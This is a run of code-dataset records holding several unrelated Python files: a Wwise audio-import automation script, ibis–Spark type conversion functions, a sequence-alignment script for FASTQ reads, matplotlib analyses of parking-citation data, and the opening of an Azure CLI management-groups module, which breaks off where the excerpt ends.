MyComponent.createObjArgs = {\n\n \"parent\": MyComponent.objParID,\n \"type\": MyComponent.objType,\n \"name\": MyComponent.objName,\n \"onNameConflict\": MyComponent.nameConflict,\n \"notes\": MyComponent.objNotes\n\n }\n\n def setupAudioFilePath():\n print(\"Setting up audio file path\")\n pathToFiles = os.path.expanduser(MyComponent.INPUT_audioFilePath)\n setupAudioFileList(pathToFiles)\n\n def setupAudioFileList(path):\n print(\"Setting up list of audio files\")\n\n filelist = []\n pattern = '*.wav'\n for root, dirs, files in os.walk(path):\n # for file in os.listdir(path):\n for filename in fnmatch.filter(files, pattern):\n absFilePath = os.path.abspath(os.path.join(root, filename))\n filelist.append(absFilePath)\n\n MyComponent.INPUT_audioFileList = filelist\n\n def setupImportArgs(parentID, fileList,originalsPath):\n print (\"Args for audio importing\")\n ParentID = str(parentID)\n importFilelist = 
[]\n for audiofile in fileList:\n foo = audiofile.rsplit('.') #remove extension from filename\n audiofilename = foo[0]\n importFilelist.append(\n {\n \"audioFile\": audiofile,\n \"objectPath\": \"\"+os.path.basename(audiofilename)\n }\n )\n\n MyComponent.importArgs = {\n \"importOperation\": \"useExisting\",\n \"default\": {\n \"importLanguage\": \"SFX\",\n \"importLocation\": ParentID,\n \"originalsSubFolder\": originalsPath\n },\n \"imports\": importFilelist\n\n }\n print (MyComponent.importArgs)\n\n def getSelectedObject():\n try:\n x = yield from self.call(WAAPI_URI.ak_wwise_ui_getselectedobjects)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n #print (x)\n MyComponent.Results = x\n\n def createWwiseObject(args):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_object_create, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n MyComponent.Results = res\n\n def importAudioFiles(args):\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_audio_import, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n #MyComponent.Results = res\n\n def onObjectCreated(**kwargs):\n if not MyComponent.eventCreated:\n print(\"Object was created\")\n print(kwargs)\n ob = kwargs[\"object\"]\n obID = ob[\"id\"]\n arguments = {\n \"from\": {\"id\": [obID]},\n \"options\": {\n \"return\": [\"type\", \"name\", \"category\",\"id\",\"path\"]\n }\n }\n try:\n res2 = yield from self.call(WAAPI_URI.ak_wwise_core_object_get, **arguments)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n print(res2.kwresults)\n\n askUserForImportDirectory()\n\n setupSubscriptions()\n\n #yield setupAudioFilePath()\n\n print(\"This is the name of the script\", sys.argv[0])\n print(\"This is the number of arguments\", len(sys.argv))\n print(\"The arguments are...\", str(sys.argv))\n\n\n\n print(\"This script will auto create wwise objects and events...\")\n print(\"...Select an object to be the 
parent in the Project Explorer\")\n\n\n\n\n\n def onDisconnect(self):\n print(\"The client was disconnected.\")\n\n asyncio.get_event_loop().stop()\n\n\nif __name__ == '__main__':\n runner = ApplicationRunner(url=u\"ws://127.0.0.1:8095/waapi\", realm=u\"realm1\")\n try:\n runner.run(MyComponent)\n except Exception as e:\n print(type(e).__name__ + \": Is Wwise running and Wwise Authoring API enabled?\")\n","sub_path":"SimpleCreateAndImport/CreateNewObjects_WithImport.py","file_name":"CreateNewObjects_WithImport.py","file_ext":"py","file_size_in_byte":11349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561944764","text":"import functools\n\nimport pyspark.sql.types as pt\n\nimport ibis.common.exceptions as com\nimport ibis.expr.datatypes as dt\nfrom ibis.backends.base.sql.registry import sql_type_names\nfrom ibis.expr.schema import Schema\n\n_sql_type_names = dict(sql_type_names, date='date')\n\n\ndef type_to_sql_string(tval):\n if isinstance(tval, dt.Decimal):\n return 'decimal({}, {})'.format(tval.precision, tval.scale)\n name = tval.name.lower()\n try:\n return _sql_type_names[name]\n except KeyError:\n raise com.UnsupportedBackendType(name)\n\n\n# maps pyspark type class to ibis type class\n_SPARK_DTYPE_TO_IBIS_DTYPE = {\n pt.NullType: dt.Null,\n pt.StringType: dt.String,\n pt.BinaryType: dt.Binary,\n pt.BooleanType: dt.Boolean,\n pt.DateType: dt.Date,\n pt.DoubleType: dt.Double,\n pt.FloatType: dt.Float,\n pt.ByteType: dt.Int8,\n pt.IntegerType: dt.Int32,\n pt.LongType: dt.Int64,\n pt.ShortType: dt.Int16,\n pt.TimestampType: dt.Timestamp,\n}\n\n\n@dt.dtype.register(pt.DataType)\ndef spark_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n \"\"\"Convert Spark SQL type objects to ibis type objects.\"\"\"\n ibis_type_class = _SPARK_DTYPE_TO_IBIS_DTYPE.get(type(spark_dtype_obj))\n return ibis_type_class(nullable=nullable)\n\n\n@dt.dtype.register(pt.DecimalType)\ndef 
spark_decimal_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n precision = spark_dtype_obj.precision\n scale = spark_dtype_obj.scale\n return dt.Decimal(precision, scale, nullable=nullable)\n\n\n@dt.dtype.register(pt.ArrayType)\ndef spark_array_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n value_type = dt.dtype(\n spark_dtype_obj.elementType, nullable=spark_dtype_obj.containsNull\n )\n return dt.Array(value_type, nullable=nullable)\n\n\n@dt.dtype.register(pt.MapType)\ndef spark_map_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n key_type = dt.dtype(spark_dtype_obj.keyType)\n value_type = dt.dtype(\n spark_dtype_obj.valueType, nullable=spark_dtype_obj.valueContainsNull\n )\n return dt.Map(key_type, value_type, nullable=nullable)\n\n\n@dt.dtype.register(pt.StructType)\ndef spark_struct_dtype_to_ibis_dtype(spark_dtype_obj, nullable=True):\n names = spark_dtype_obj.names\n fields = spark_dtype_obj.fields\n ibis_types = [dt.dtype(f.dataType, nullable=f.nullable) for f in fields]\n return dt.Struct(names, ibis_types, nullable=nullable)\n\n\n_IBIS_DTYPE_TO_SPARK_DTYPE = {\n v: k for k, v in _SPARK_DTYPE_TO_IBIS_DTYPE.items()\n}\n\nspark_dtype = functools.singledispatch('spark_dtype')\n# from multipledispatch import Dispatcher\n# spark_dtype = Dispatcher('spark_dtype')\n\n\n@spark_dtype.register(object)\ndef default(value, **kwargs) -> pt.DataType:\n raise com.IbisTypeError('Value {!r} is not a valid datatype'.format(value))\n\n\n@spark_dtype.register(pt.DataType)\ndef from_spark_dtype(value: pt.DataType) -> pt.DataType:\n return value\n\n\n@spark_dtype.register(dt.DataType)\ndef ibis_dtype_to_spark_dtype(ibis_dtype_obj):\n \"\"\"Convert ibis types types to Spark SQL.\"\"\"\n return _IBIS_DTYPE_TO_SPARK_DTYPE.get(type(ibis_dtype_obj))()\n\n\n@spark_dtype.register(dt.Decimal)\ndef ibis_decimal_dtype_to_spark_dtype(ibis_dtype_obj):\n precision = ibis_dtype_obj.precision\n scale = ibis_dtype_obj.scale\n return pt.DecimalType(precision, 
scale)\n\n\n@spark_dtype.register(dt.Array)\ndef ibis_array_dtype_to_spark_dtype(ibis_dtype_obj):\n element_type = spark_dtype(ibis_dtype_obj.value_type)\n contains_null = ibis_dtype_obj.value_type.nullable\n return pt.ArrayType(element_type, contains_null)\n\n\n@spark_dtype.register(dt.Map)\ndef ibis_map_dtype_to_spark_dtype(ibis_dtype_obj):\n key_type = spark_dtype(ibis_dtype_obj.key_type)\n value_type = spark_dtype(ibis_dtype_obj.value_type)\n value_contains_null = ibis_dtype_obj.value_type.nullable\n return pt.MapType(key_type, value_type, value_contains_null)\n\n\n@spark_dtype.register(dt.Struct)\n@spark_dtype.register(Schema)\ndef ibis_struct_dtype_to_spark_dtype(ibis_dtype_obj):\n fields = [\n pt.StructField(n, spark_dtype(t), t.nullable)\n for n, t in zip(ibis_dtype_obj.names, ibis_dtype_obj.types)\n ]\n return pt.StructType(fields)\n","sub_path":"ibis/backends/spark/datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481076740","text":"from pprint import pprint\r\n\r\ndef align(s,t):\r\n i=0\r\n j=0\r\n for i in range(0,len(s)+1):\r\n h=[]\r\n for j in range(0,len(t)+1):\r\n h.append(0)\r\n y.append(h)\r\n for i in range(0,len(s)+1):\r\n r=[]\r\n for j in range(0,len(t)+1):\r\n r.append(0)\r\n x.append(r)\r\n for i in range(0,len(t)+1):\r\n x[0][i]=0\r\n for i in range(0,len(s)+1):\r\n x[i][0]=0\r\n for i in range(1,len(s)+1):\r\n for j in range(1,len(t)+1):\r\n MAX_A=(x[i-1][j-1] + score(s[i-1],t[j-1]))\r\n MAX_B=(x[i-1][j] + score(s[i-1],'-'))\r\n MAX_C=(x[i][j-1] + score('-',t[j-1]))\r\n if ( MAX_A > MAX_B) and (MAX_A > MAX_C) and MAX_A>0:\r\n x[i][j] = MAX_A\r\n y[i][j] = 'Y'\r\n elif MAX_B > MAX_C and MAX_B>0:\r\n x[i][j] = MAX_B\r\n y[i][j] = '|'\r\n elif MAX_C>0:\r\n x[i][j] = MAX_C\r\n y[i][j] = '-'\r\n else:\r\n x[i][j] = 0\r\n y[i][j] = 'B'\r\n counter1=0\r\n counter2=0\r\n max_score=-1\r\n max_x=0\r\n max_y=0\r\n 
for counter1 in range(0,len(s)+1):\r\n for counter2 in range(0,len(t)+1):\r\n if x[counter1][counter2]>max_score:\r\n max_score=x[counter1][counter2]\r\n max_x=counter1\r\n max_y=counter2\r\n align_s = ''\r\n align_t = ''\r\n counter1=max_x\r\n counter2=max_y\r\n while_turn=0\r\n while counter1!=0 or counter2!=0:\r\n if y[counter1][counter2]=='Y':\r\n counter1=counter1-1\r\n counter2=counter2-1\r\n align_s=s[counter1]+align_s\r\n align_t=t[counter2]+align_t\r\n elif y[counter1][counter2] == '|':\r\n counter1=counter1-1\r\n align_s=s[counter1]+align_s\r\n align_t='-'+align_t\r\n elif y[counter1][counter2] == 'B':\r\n counter2=counter2-1\r\n break\r\n else:\r\n break\r\n while_turn=while_turn+1\r\n return counter2\r\ndef score(a,b):\r\n if a==b:\r\n return 1\r\n else:\r\n return -1\r\nx=[]\r\ny=[]\r\nt=''\r\np1=None\r\np2=None\r\ncounter=0\r\ncounter_1=0\r\nname=''\r\nname_ref=''\r\nref=''\r\ns=''\r\nwith open(\"small_ref.fa\") as f2:\r\n for line in f2:\r\n if counter==0:\r\n name_ref=line.strip()\r\n counter=1\r\n else:\r\n ref=ref+line.strip()\r\nprint('name ref',name_ref,'ref',ref)\r\n\r\n\r\ncounter=0\r\ndifc=''\r\nwith open(\"small.fastq\") as f1:\r\n with open('output.txt', 'w') as f2:\r\n for line in f1:\r\n if counter == 0:\r\n name = line.strip()\r\n counter += 1\r\n continue\r\n if counter == 1:\r\n s = line.strip()\r\n counter += 1\r\n continue\r\n if counter == 2:\r\n counter += 1\r\n continue\r\n if counter == 3:\r\n difc = line.strip()\r\n counter = 0\r\n print(name, name_ref, align(s, ref), s, difc, sep='\\t', file=f2)\r\n","sub_path":"genome local with files[DONE].py","file_name":"genome local with files[DONE].py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51664612","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdate\r\nimport calmap\r\n'''\r\n Chronological Analysis\r\n\r\n 
Functions:\r\n num_year()\r\n num_month(year)\r\n num_weekday(month, year)\r\n dayofyear(year, month = [1,12])\r\n bar_month()\r\n timeofday(year)\r\n bar_date(year)\r\n bar_date_top(year, top = 10, reverse = False)\r\n calheatmap(year)\r\n \r\n Author: Xu Zhu\r\n'''\r\n\r\npd.plotting.register_matplotlib_converters()\r\nplt.rcParams['figure.figsize'] = (20.0, 15.0)\r\nplt.rcParams['figure.dpi'] = 100\r\nplt.rcParams['font.size'] = 16\r\n\r\ndef plot_num_avg(x_axis, xlab, num, numlab, avg, avglab, title, isweek = False):\r\n '''\r\n Line plot: x = x_axis y = num, avg\r\n xlab, numlab, avglab for label\r\n if isweek == True, x will be daynames of aweek\r\n x, y label fontsize = 20\r\n title fontsize = 24\r\n '''\r\n assert len(x_axis) == len(num) and len(x_axis) == len(avg) #check data length\r\n assert all(isinstance(x, str) for x in [xlab, numlab, avglab, title])\r\n \r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel(xlab, fontsize = 20)\r\n ax_num.set_ylabel(numlab, fontsize = 20)\r\n ax_num.set_title(title, fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n ax_num.yaxis.set_ticklabels(['1.8M', '1.9M', '2M', '2.1M', '2.2M', '2.3M'])\r\n\r\n ax_avg = ax_num.twinx()\r\n ln2 = ax_avg.plot(x_axis, avg, 'b--o', label='avg_fine')\r\n ax_avg.set_ylabel(avglab, fontsize = 20)\r\n ax_avg.set_ylim([65, 75])\r\n\r\n ln = ln1 + ln2\r\n labels = [l.get_label() for l in ln]\r\n ax_num.legend(ln, labels, loc = 0, fontsize = 16)\r\n\r\n #annotate\r\n for a,b in zip(x_axis, num):\r\n ax_num.annotate(str(b), xy=(a,b), xytext=(a-0.15, b*1.002), fontsize = 16)\r\n for a,b in zip(x_axis, avg):\r\n ax_avg.annotate(str(\"{:.2f}\".format(b)), xy=(a,b), xytext=(a-0.1, b*1.002), fontsize = 16)\r\n\r\n if isweek == True:\r\n plt.xticks(x_axis, dayname)\r\n else:\r\n plt.xticks(x_axis)\r\n plt.show()\r\n\r\ndef 
plot_num(x_axis, xlab, num, numlab, title, isweek = False):\r\n '''\r\n Line plot: x = x_axis y = num\r\n xlab, numlab for label\r\n if isweek == True, x will be daynames of aweek\r\n x, y label fontsize = 20\r\n title fontsize = 24\r\n '''\r\n \r\n assert len(x_axis) == len(num) #check data length\r\n assert all(isinstance(x, str) for x in [xlab, numlab, title])\r\n \r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel(xlab, fontsize = 20)\r\n ax_num.set_ylabel(numlab, fontsize = 20)\r\n ax_num.set_title(title, fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n\r\n\r\n #annotate\r\n for a,b in zip(x_axis, num):\r\n ax_num.annotate(str(b), xy=(a,b), xytext=(a-0.05, b*1.008))\r\n\r\n if isweek == True:\r\n plt.xticks(x_axis, dayname)\r\n else:\r\n plt.xticks(x_axis)\r\n plt.show()\r\n\r\n\r\n\r\ndef num_year():\r\n '''\r\n Number and Average Fine versus Years\r\n x-axis: year in [2015, 2016, 2017, 2018]\r\n y-axis: num, fine amount\r\n '''\r\n \r\n years = [2015, 2016, 2017, 2018]\r\n num = []\r\n avg_fine = []\r\n for year in years:\r\n df = pd.read_csv(str(year)+'parking-citations.csv')\r\n num.append(len(df))\r\n avg_fine.append(df.loc[:,'Fine amount'].mean())\r\n #plot\r\n plot_num_avg(x_axis = years, xlab = 'Years', num = num, numlab = 'Number of Citations per Year', avg = avg_fine, avglab = 'Average Fine Amount', title = 'Num. and Avg. 
Fine vs Year')\r\n\r\n\r\ndef num_month(year):\r\n '''\r\n Line chart: Number of citations over month in year [2015, 2016, 2017, 2018]\r\n x-axis: year in [2015, 2016, 2017, 2018]\r\n y-axis: num\r\n '''\r\n assert year in [2015, 2016, 2017, 2018, 'all']\r\n \r\n if year == 'all':\r\n df15 = pd.read_csv('2015parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp15 = df15['Fine amount'].groupby(df15['Issue Date'].dt.month)\r\n df16 = pd.read_csv('2016parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp16 = df16['Fine amount'].groupby(df16['Issue Date'].dt.month)\r\n df17 = pd.read_csv('2017parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp17 = df17['Fine amount'].groupby(df17['Issue Date'].dt.month)\r\n df18 = pd.read_csv('2018parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp18 = df18['Fine amount'].groupby(df18['Issue Date'].dt.month)\r\n\r\n x_axis = range(48)\r\n num = pd.concat([gp15.count(), gp16.count(), gp17.count(), gp18.count()], axis = 0, ignore_index = True)\r\n \r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel('Months', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations per Month', fontsize = 20)\r\n ax_num.set_title('Number of citations vs Month Overall', fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.9, max(num)*1.05])\r\n ax_num.yaxis.set_ticklabels(['120K', '140K', '160K', '180K', '200K', '220K'])\r\n\r\n\r\n #annotate\r\n tag = []\r\n for a in range(2015, 2019):\r\n for b in range(1, 13):\r\n tag.append(str(a) + '.' 
+ '{:0=2}'.format(b))\r\n for a in range(2,50,12):\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a-4, num[a] + 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n for a in [10, 22, 34, 46]:\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a-4, num[a] - 12000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n for a in [1, 25, 37]:\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a, num[a] - 3000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n plt.xticks([])\r\n plt.show()\r\n \r\n \r\n else:\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'].dt.month)\r\n #plot\r\n plot_num(x_axis = range(1,13), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Month', title = str(year) + ' ' + 'Number of citations vs Month')\r\n\r\n \r\ndef num_weekday(month, year):\r\n '''\r\n Line plot\r\n '''\r\n assert month in range(1,13) or month == 'all'\r\n assert year in [2015, 2016, 2017, 2018]\r\n\r\n import calendar\r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n if month == 'all':\r\n gp = df['Fine amount'].groupby(df['Issue Date'].dt.weekday)\r\n plot_num(x_axis = range(7), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Weekday', title = str(year) + ' ' + 'Number of Citations vs Weekday', isweek = True)\r\n else:\r\n gp = df.loc[df['Issue Date'].dt.month == month]['Fine amount'].groupby(df['Issue Date'].dt.weekday)\r\n plot_num(x_axis = range(7), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Weekday', title = str(year) + ' ' + calendar.month_name[month]+ ' Number of Citations vs Month', isweek = True)\r\n\r\ndef dayofyear(year, month = 
[1,12]):\r\n '''\r\n Plot a line chart. Number of citations vs Date in a specific year \r\n Input:\r\n year: year in [2015, 2016, 2017, 2018]\r\n '''\r\n \r\n assert year in [2015, 2016, 2017, 2018]\r\n assert isinstance(month, list)\r\n assert isinstance(month[0], int) and month[0] > 0\r\n assert isinstance(month[1], int) and month[1] < 13\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n df = df[df['Issue Date'].dt.month <= month[1]]\r\n df = df[df['Issue Date'].dt.month >= month[0]]\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n fig = plt.figure()\r\n x_axis = gp.count().index\r\n ax_num = fig.add_subplot(111)\r\n ax_num.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d'))\r\n #ax_num.plot(x_axis, gp.count(), 'b-', label='num', linewidth = 0.5)\r\n ax_num.set_xlabel('Date', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations per Day', fontsize = 20)\r\n ax_num.set_title(str(year) + ' ' + 'Number of Citations vs Date', fontsize = 24)\r\n ax_num.set_ylim([min(gp.count())*0.5, max(gp.count())*1.15])\r\n\r\n #fill\r\n avg = gp.count().mean()\r\n plt.fill_between(x_axis, gp.count(), avg, where= gp.count() >= avg, facecolor = 'green', interpolate = True, alpha = 0.7)\r\n plt.fill_between(x_axis, gp.count(), avg, where= gp.count() <= avg, facecolor = 'red', interpolate = True, alpha = 0.7)\r\n\r\n #annotate\r\n plt.annotate('Max ' + str(gp.count().idxmax().to_pydatetime().date()) + ' ' + str(gp.count().max()), xy = (gp.count().idxmax(), gp.count().max()), xytext = (gp.count().idxmax() + pd.Timedelta(weeks = 2), gp.count().max()*1.05), arrowprops=dict(facecolor='steelblue', shrink=0.02), fontsize=15, color='black')\r\n plt.annotate('Min ' + str(gp.count().idxmin().to_pydatetime().date()) + ' ' + str(gp.count().min()), xy = (gp.count().idxmin(), gp.count().min()), xytext = (gp.count().idxmin() - pd.Timedelta(weeks = 6), gp.count().min()*1.00), arrowprops=dict(facecolor='steelblue', shrink=0.02), 
fontsize=15, color='black')\r\n \r\n plt.xticks(pd.date_range(x_axis[0], x_axis[-1], freq = 'M'), rotation = 0)\r\n plt.show()\r\n\r\ndef bar_month():\r\n '''\r\n Bar chart: x = month y = Number of Citations per Month each year\r\n y starts from 100000\r\n '''\r\n\r\n df15 = pd.read_csv('2015parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp15 = df15['Fine amount'].groupby(df15['Issue Date'].dt.month)\r\n df16 = pd.read_csv('2016parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp16 = df16['Fine amount'].groupby(df16['Issue Date'].dt.month)\r\n df17 = pd.read_csv('2017parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp17 = df17['Fine amount'].groupby(df17['Issue Date'].dt.month)\r\n df18 = pd.read_csv('2018parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp18 = df18['Fine amount'].groupby(df18['Issue Date'].dt.month)\r\n\r\n\r\n x_axis = range(2,26,2)\r\n bar1 = plt.bar(x = [i - 0.15 for i in x_axis], height = gp15.count(), width = 0.3, color = 'red', label = '2015')\r\n bar2 = plt.bar(x = [i + 0.15 for i in x_axis], height = gp16.count(), width = 0.3, color = 'green', label = '2016')\r\n bar3 = plt.bar(x = [i + 0.45 for i in x_axis], height = gp17.count(), width = 0.3, color = 'pink', label = '2017')\r\n bar4 = plt.bar(x = [i + 0.75 for i in x_axis], height = gp18.count(), width = 0.3, color = 'purple', label = '2018')\r\n\r\n plt.ylabel('Number of Citations per Month', fontsize = 20)\r\n plt.xticks([i + 0.3 for i in x_axis], range(1,13))\r\n plt.xlabel('Month', fontsize = 20)\r\n plt.title('Number of Citations vs Month in Each Year', fontsize = 24)\r\n plt.ylim([120000, 220000])\r\n plt.legend()\r\n\r\n plt.show()\r\n\r\ndef timeofday(year):\r\n '''\r\n Line Chart: Citations over Period of Day(half an hour)\r\n '''\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue time'])\r\n lbin = list(range(30, 2430,100)) + list(range(0, 2500, 100))\r\n 
lbin.sort()\r\n cut1 = pd.cut(df['Issue time'], lbin, right = False, include_lowest = True)\r\n num = cut1.value_counts(sort = False)\r\n \r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(range(48), num, 'r--o', label='num')\r\n ax_num.set_xlabel('Time Period of Day', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations', fontsize = 20)\r\n ax_num.set_title(str(year) + ' ' + 'Number of Citations vs Time Period of Day', fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n\r\n \r\n ax_num.annotate('8:00', xy=(16,num[800]), xytext=(12, num[800] - 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n ax_num.annotate('10:00', xy=(20,num[1000]), xytext=(20, num[800] + 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black') \r\n ax_num.annotate('12:00', xy=(24,num[1200]), xytext=(26, num[1200] - 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n\r\n plt.xticks(range(0, 48, 6), [num.keys()[x] for x in range(0, 48, 6)], rotation = 0, fontsize = 14)\r\n plt.show()\r\n \r\ndef bar_date(year):\r\n '''\r\n Bar chart: Number of Citations via date\r\n '''\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n\r\n x_axis = gp.count().index\r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ax_num.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d'))\r\n \r\n ax_num.bar(x = gp.count().index, height = gp.count(), width = 1, color = 'red', label = str(year))\r\n ax_num.set_ylabel('Number of Citations per Month')\r\n ax_num.set_xlabel('Month')\r\n ax_num.set_title('Number of Citations vs Month in Each Year')\r\n plt.xticks(pd.date_range(x_axis[0], x_axis[-1], freq = 'M'), rotation = 45)\r\n plt.show()\r\n\r\ndef bar_date_top(year, top = 10, reverse = False):\r\n '''\r\n Bar chart: Plot top(or bottom) Number 
of Citations Date\r\n\r\n Input:\r\n year: which year of data to analyse\r\n top: number of data to be ploted\r\n reverse: choose top or bottom(top is False)\r\n\r\n '''\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n num = gp.count().sort_values(ascending = reverse)[:top]\r\n x_axis = range(top)\r\n \r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ax_num.bar(x = x_axis, height = num, width = 0.8, color = 'red', label = str(year))\r\n ax_num.set_ylabel('Number of Citations per Day', fontsize = 20)\r\n if reverse == False:\r\n ax_num.set_title(str(year) + ' Most Amounts of Citations Date', fontsize = 24)\r\n else:\r\n ax_num.set_title(str(year) + ' Least Amounts of Citations Date', fontsize = 24)\r\n\r\n for a,b in zip(x_axis, num):\r\n ax_num.text(a, b+1, num.index[a].to_pydatetime().strftime(\"%a\") + ', ' + str(b), ha=\"center\", va=\"bottom\", fontsize = 15)\r\n plt.ylim([0,num.max()*1.3])\r\n plt.xticks(x_axis,[str(x.to_pydatetime().date()) for x in num.index],rotation = 45, fontsize = 14)\r\n plt.savefig('')\r\n plt.show()\r\n\r\ndef calheatmap(year):\r\n '''\r\n Plot a Calendar heat map. 
Number of citations vs Date in a specific year \r\n Input:\r\n year: year in [2015, 2016, 2017, 2018]\r\n '''\r\n \r\n assert year in [2015, 2016, 2017, 2018]\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n calmap.calendarplot(gp.count(), fig_kws = {'figsize':(16,10)}, yearlabels = False, subplot_kws = {'title':'Number of Citations in Year ' + str(year)})\r\n plt.show()\r\n \r\nif __name__ == \"__main__\":\r\n num_year()\r\n #dayofyear(2015, [1,4])\r\n #dayofyear(2016, [1,12])\r\n #dayofyear(2017, [1,12])\r\n #dayofyear(2018, [1,4])\r\n #num_month(2015)\r\n #num_month(2016)\r\n #num_month(2017)\r\n #num_month(2018)\r\n #num_month('all')\r\n #bar_month()\r\n #num_weekday('all', 2015)\r\n #num_weekday('all', 2016)\r\n #bar_date_top(year = 2015, top = 10, reverse = False)\r\n #bar_date_top(year = 2015, top = 10, reverse = True)\r\n #timeofday(2015)\r\n #timeofday(2016)\r\n #timeofday(2017)\r\n timeofday(2018)\r\n #calheatmap(2018)\r\n","sub_path":"chrono.py","file_name":"chrono.py","file_ext":"py","file_size_in_byte":15976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346039681","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core._profile import Profile\n\n\ndef _register_rp(cli_ctx, subscription_id=None):\n rp = \"Microsoft.Management\"\n from azure.cli.core.commands.client_factory import get_mgmt_service_client\n from azure.cli.core.profiles import ResourceType\n import time\n rcf = get_mgmt_service_client(\n cli_ctx,\n ResourceType.MGMT_RESOURCE_RESOURCES,\n subscription_id)\n rcf.providers.register(rp)\n while True:\n time.sleep(10)\n rp_info = rcf.providers.get(rp)\n if rp_info.registration_state == 'Registered':\n break\n\n\ndef _get_subscription_id_from_subscription(cli_ctx, subscription): # pylint: disable=inconsistent-return-statements\n profile = Profile(cli_ctx=cli_ctx)\n subscriptions_list = profile.load_cached_subscriptions()\n for sub in subscriptions_list:\n if sub['id'] == subscription or sub['name'] == subscription:\n return sub['id']\n from azure.cli.core.util import CLIError\n raise CLIError(\"Subscription not found in the current context.\")\n\n\ndef cli_managementgroups_group_list(cmd, client):\n _register_rp(cmd.cli_ctx)\n return client.list()\n\n\ndef cli_managementgroups_group_show(\n cmd,\n client,\n group_name,\n expand=False,\n recurse=False):\n _register_rp(cmd.cli_ctx)\n if expand:\n return client.get(group_name, \"children\", recurse)\n return client.get(group_name)\n\n\ndef cli_managementgroups_group_create(\n 